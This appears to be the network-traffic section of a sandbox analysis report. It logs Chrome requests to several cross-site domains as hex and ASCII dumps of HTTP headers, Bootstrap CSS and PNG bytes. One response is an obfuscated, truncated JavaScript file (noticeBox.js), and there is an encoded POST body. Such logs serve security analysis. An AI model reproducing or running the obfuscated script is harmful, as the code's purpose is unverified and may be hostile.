                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC669INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 117368
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-212-22
                                                                                                                                                          ETag: "633d510e-1ca78"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:17 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp212:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-212-22
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-17
                                                                                                                                                          X-Cdn-Request-ID: ce785f03d599b8605c85f6bfb0340297
                                                                                                                                                          2024-06-09 22:41:17 UTC15715INData Raw: 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72
                                                                                                                                                          Data Ascii: html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;ver
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: 3a 6e 6f 6e 65 7d 61 3a 68 6f 76 65 72 2c 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 32 33 35 32 37 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 2c 2e 74 68 75 6d 62 6e 61 69 6c 3e 69 6d 67 2c 2e 74 68 75 6d 62 6e 61 69 6c 20 61 3e 69 6d 67 2c 2e 63 61 72 6f 75 73 65 6c 2d 69 6e 6e
                                                                                                                                                          Data Ascii: :none}a:hover,a:focus{color:#23527c;text-decoration:underline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}figure{margin:0}img{vertical-align:middle}.img-responsive,.thumbnail>img,.thumbnail a>img,.carousel-inn
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: 72 3e 74 64 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 3e 74 64 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 66 6f 6f 74 3e 74 72 3e 74 64 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 68 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 3e 74 68 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 66 6f 6f 74 3e 74 72 3e 74 68 2e 69 6e 66 6f 2c 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 2e 69 6e 66 6f 3e 74 64 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 2e 69 6e 66 6f 3e 74 64 2c 2e 74 61 62 6c 65 3e 74 66 6f 6f 74 3e 74 72 2e 69 6e 66 6f 3e 74 64 2c 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 2e 69 6e 66 6f 3e 74 68 2c 2e 74 61 62 6c 65 3e 74 62 6f 64 79 3e 74 72 2e 69 6e 66 6f 3e 74 68 2c 2e 74 61 62 6c
                                                                                                                                                          Data Ascii: r>td.info,.table>tbody>tr>td.info,.table>tfoot>tr>td.info,.table>thead>tr>th.info,.table>tbody>tr>th.info,.table>tfoot>tr>th.info,.table>thead>tr.info>td,.table>tbody>tr.info>td,.table>tfoot>tr.info>td,.table>thead>tr.info>th,.table>tbody>tr.info>th,.tabl
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 5b 64 69 73 61 62 6c 65 64 5d 2e 66 6f 63 75 73 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 3a 61 63 74 69 76 65 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 5b 64 69 73 61 62 6c 65 64 5d 3a 61 63 74 69 76 65 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 61 63 74 69 76 65 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 5b 64 69 73 61 62 6c 65 64 5d 2e 61 63 74 69 76 65 2c 66 69 65
                                                                                                                                                          Data Ascii: .btn-success.disabled.focus,.btn-success[disabled].focus,fieldset[disabled] .btn-success.focus,.btn-success.disabled:active,.btn-success[disabled]:active,fieldset[disabled] .btn-success:active,.btn-success.disabled.active,.btn-success[disabled].active,fie
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: 3e 6c 69 2b 6c 69 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 70 78 7d 2e 6e 61 76 2d 70 69 6c 6c 73 3e 6c 69 2e 61 63 74 69 76 65 3e 61 2c 2e 6e 61 76 2d 70 69 6c 6c 73 3e 6c 69 2e 61 63 74 69 76 65 3e 61 3a 68 6f 76 65 72 2c 2e 6e 61 76 2d 70 69 6c 6c 73 3e 6c 69 2e 61 63 74 69 76 65 3e 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 37 61 62 37 7d 2e 6e 61 76 2d 73 74 61 63 6b 65 64 3e 6c 69 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 7d 2e 6e 61 76 2d 73 74 61 63 6b 65 64 3e 6c 69 2b 6c 69 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6e 61 76 2d 6a 75 73 74 69 66 69 65 64
                                                                                                                                                          Data Ascii: >li+li{margin-left:2px}.nav-pills>li.active>a,.nav-pills>li.active>a:hover,.nav-pills>li.active>a:focus{color:#fff;background-color:#337ab7}.nav-stacked>li{float:none}.nav-stacked>li+li{margin-top:2px;margin-left:0}.nav-justified{width:100%}.nav-justified
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: 6f 6e 3a 62 6f 72 64 65 72 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 74 68 75 6d 62 6e 61 69 6c 3e 69 6d 67 2c 2e 74 68 75 6d 62 6e 61 69 6c 20 61 3e 69 6d 67 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 61 2e 74 68 75 6d 62 6e 61 69 6c 3a 68 6f 76 65 72 2c 61 2e 74 68 75 6d 62 6e 61 69 6c 3a 66 6f 63 75 73 2c 61 2e 74 68 75 6d 62 6e 61 69 6c 2e 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 33 37 61 62 37 7d 2e 74 68 75 6d 62 6e 61 69 6c 20 2e 63 61 70
                                                                                                                                                          Data Ascii: on:border .2s ease-in-out;-o-transition:border .2s ease-in-out;transition:border .2s ease-in-out}.thumbnail>img,.thumbnail a>img{margin-right:auto;margin-left:auto}a.thumbnail:hover,a.thumbnail:focus,a.thumbnail.active{border-color:#337ab7}.thumbnail .cap
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 62 6f 64 79 3e 74 72 3e 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 66 6f 6f 74 3e 74 72 3e 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 66 6f 6f 74 3e 74 72 3e 74 68 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 3e 74 68 65 61 64 3e 74 72 3e 74 64 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 70 61 6e 65 6c 3e 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65
                                                                                                                                                          Data Ascii: ild,.panel>.table-responsive>.table-bordered>tbody>tr>th:last-child,.panel>.table-bordered>tfoot>tr>th:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:last-child,.panel>.table-bordered>thead>tr>td:last-child,.panel>.table-responsive>.table
                                                                                                                                                          2024-06-09 22:41:18 UTC3349INData Raw: 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 68 69 64 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 68 6f 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 76 69 73 69 62 6c 65 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 74 65 78 74 2d 68 69 64 65 7b 66 6f 6e 74 3a 30 2f 30 20 61 3b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 30 7d 2e 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 66 66 69 78 7b 70 6f 73 69 74 69 6f 6e 3a 66 69
                                                                                                                                                          Data Ascii: t{float:left!important}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.hidden{display:none!important}.affix{position:fi


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          480192.168.2.55025223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC555OUTGET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7648
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-1de0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE8[4],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2577449
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0e5d084bf0c12b1f6a6e668fa6f2298f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 14551
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC7648INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 42 59 41 61 51 67 5a 67 45 59 42 64 59 67 62 77 43 49 4b 41 32 58 46 65 67 4c 67 44 4d 42 58 4e 47 41 46 77 43 57 36 54 50 32 49 68 69 67 67 4a 53 31 2b 41 4f 68 41 41 50 43 43 67 42 4f 2f 4a 41 46 35 42 6d 65 6f 51 43 63 6e 41 4b 72 30 70 6d 43 68 53 6b 42 66 59 76 56 77 41 35 4d 41 48 6b 4f 50 50 6b 4a 46 69 51 4d 6d 2f 51 44 73 41 47 71 4b 41 41 71 75 76 41 4c 43 61 4b 4c 69 50 72 62 36 66 67 6a 36 59 65 36 52 30 52 4c 53 44 4e 78 49 49 41 41 45 53 50 79 71 67 67 4c 30 41 4e 78 4f 59 41 42 57 49 41 4a 79 41 43 59 67 6e 49 4a 6f 49 4d 47 71 4b 42 41 67 36 67 43 65 6d 42 4c 30 41 50 72 39 49 45 67 41 73 69 69 31 33 41 41 32 49 50
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          481192.168.2.55025323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC600OUTGET /pc/image-pc/index/382/10100.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 59933
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 09:05:19 GMT
                                                                                                                                                          ETag: "64c0e1cf-ea1d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE26[4],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473793
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 10255469d60c74d63683c99e989e6c52
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118208
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:17 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                          Data Ascii: PNGIHDRXtEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: 3d 79 e7 62 ef fe 89 ed 56 2f f2 25 d2 10 f7 af 6c 24 d4 48 2a 00 84 17 80 22 a7 1f 71 5c 89 27 74 42 03 3d 8b f5 3c 9e 9c 56 6e fd 55 de 54 43 66 69 45 37 26 37 92 ba 2c 49 41 f7 d4 6a 24 6c 9f 03 7b 5c 3f f4 86 5e 98 1d cb 7d ab bf ee 21 7b 3b 2d 1e b7 9e ae c4 7a 77 2b ea eb 6b 91 ed 29 80 64 b5 12 ea 82 7a a8 fb df 46 77 73 2e 2c d9 bf 80 66 8e 16 7d dc 87 c0 db 53 a0 29 b0 29 6e 5d 9a c2 16 da b8 f4 58 6e f7 80 d9 e5 18 2f 51 81 a3 4e 70 b1 ac 10 3b f1 64 a9 1b 07 6a 1a 90 fb e5 87 e0 64 0a 78 9d ce 10 e3 9a 13 01 23 20 80 3c 17 30 45 c2 b4 48 38 05 0b 2f 54 c7 0d 29 f1 d1 0d f4 88 c7 45 a2 73 61 c1 48 95 12 7d 0d 75 ae 2f 1a 5c 1f b2 2a c1 8d 5d ee 37 5e bc 7c c3 63 93 7f 36 0a a3 c7 ec 86 c3 43 bf ce cb a2 f4 5e c8 f8 7e 28 ad ad f0 9a 1d b0 f6 d3
                                                                                                                                                          Data Ascii: =ybV/%l$H*"q\'tB=<VnUTCfiE7&7,IAj$l{\?^}!{;-zw+k)dzFws.,f}S))n]Xn/QNp;djdx# <0EH8/T)EsaH}u/\*]7^|c6C^~(
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: dc ca 39 57 cd 4b 11 4e 75 ea 68 69 15 50 46 b6 5c cb d8 a1 52 9d 33 ab 40 a6 8f 7c 36 52 0a 26 8a 47 50 53 e7 b5 72 0f 6c 66 59 2e 86 61 63 0e 22 33 96 11 f6 de 00 3e b1 95 6e b0 c4 8a 50 b0 8d cd 2c 81 d7 03 6d 64 1c be be 2e 9c df 54 8c a5 ad b5 50 b2 31 e4 b2 ca a9 65 2c a6 40 31 87 a8 84 79 cf 6c f4 15 3d 5c d2 8a 53 b3 1a ee 84 04 7f 4d 21 ca 8a 12 d8 bf 71 1d 2d e6 02 7a c0 08 ca 8b d8 88 67 9e fe 24 c1 f8 5c cd a6 20 36 61 d6 ea bc 65 a3 16 38 b9 83 e4 f1 04 9d bf cd 3e 8e d1 c3 b1 30 ea 28 2d 92 73 da 3b 62 3e 49 56 d7 53 9b 79 7e d1 e6 dd e9 e3 c7 7f df 86 1b 3e d5 08 b5 98 e0 d6 a6 6d 90 7e 21 c2 3b 53 84 9a 8e 20 b7 ee 51 93 27 b8 e2 c3 ff 82 b2 eb 1c 88 8e ec 84 b3 4d 46 bc 4c c2 9d 3d 2f d2 7d 94 42 f8 d7 4e 70 07 8e 81 6b a4 ab 38 c8 07 98
                                                                                                                                                          Data Ascii: 9WKNuhiPF\R3@|6R&GPSrlfY.ac"3>nP,md.TP1e,@1yl=\SM!q-zg$\ 6ae8>0(-s;b>IVSy~>m~!;S Q'MFL=/}BNpk8
                                                                                                                                                          2024-06-09 22:41:17 UTC11398INData Raw: 66 51 a7 8f ea 96 9e 03 4b 2b 5d ab 5f 46 80 51 ce 36 56 c2 86 20 30 6c 86 f7 10 37 d1 bd 0c b9 10 6b 9b 41 53 40 87 e6 d6 f1 af cf 95 be b8 d8 30 54 c7 5b c3 3f dc 6f 66 a3 90 11 d2 13 6a 85 5b d9 1a 7a ae a0 a3 d2 cb 83 b5 d4 9b 1f 9b 47 03 23 d3 96 6a f8 ab c6 31 d5 bf 0f d1 03 2f 91 55 b9 98 5c e1 6d 04 44 49 61 f4 66 9c 72 3e c9 0c 9d 69 cf e6 04 56 12 ac 29 88 4e 4c ce cd 98 95 41 7c 6b cd 1c ea 57 dd 4d 3e 7a 77 92 ad 6e 59 09 93 b2 20 42 72 d5 92 15 62 85 13 ee c9 3d 88 1c da 83 ba b6 f7 22 58 f3 9f 58 98 5c 40 35 c1 95 4f af f4 c2 be b7 48 d8 dd 4c 88 62 bb d2 3c 6b 6e 4f 58 b8 fd 2c 56 9b 96 bc c8 54 10 d6 6e 33 9d 76 8e 5b 80 7b 69 16 d6 a9 3a 70 2c 9d 36 ac e2 be f1 85 ef 8f 41 37 70 fe 64 46 71 3c a6 4b 08 bb 78 84 ed 34 69 bc 95 0e de a8 6e
                                                                                                                                                          Data Ascii: fQK+]_FQ6V 0l7kAS@0T[?ofj[zG#j1/U\mDIafr>iV)NLA|kWM>zwnY Brb="XX\@5OHLb<knOX,VTn3v[{i:p,6A7pdFq<Kx4in


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          482192.168.2.550235103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC666OUTPOST /zb-cloud/pwv/sn.settings.get HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 484
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC484OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 41 52 71 4d 4a 58 4a 79 6d 54 48 7a 51 77 51 73 58 30 45 77 49 62 42 70 49 76 68 33 52 6e 66 33 51 4e 41 30 4c 42 65 32 50 53 56 6c 59 76 4c 77 44 69 55 63 4e 6d 62 77 73 32 35 6d 67 54 55 73 58 6a 54 68 45 30 58 64 48 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 41 72 4d 48 52 73 63 32 51 78 4a 61 57 70 5a 30 4d 73 58 6a 55 76 74 62 35 72 55 54 4f 30 66 41 35 6d 66 69 35 6e 58 56 4f 6d 43 6b 56 78 5a 62 4b 79 57 6a 4e 78 59 4a 47 79 70 42 5a 74 54 75 49 77 49 30 57 65 46 30 44 68 4a 6f 4e 79 65 73 55 77 4b 67 56 70 52 46 47 6c 44 6b 6b 63 4d 58 4a 6c 59 67 5a 7a 51 78 55 73 58 6a 55 30 61 50 55 64 45 50 46 64 4e 53 51 4c 4a 52 47 77 57 4c 4f 53 47 76 4c 77 5a 73 55 63 52 79 47 76 44 62 56 79 6b 74 31 61 62 78 42
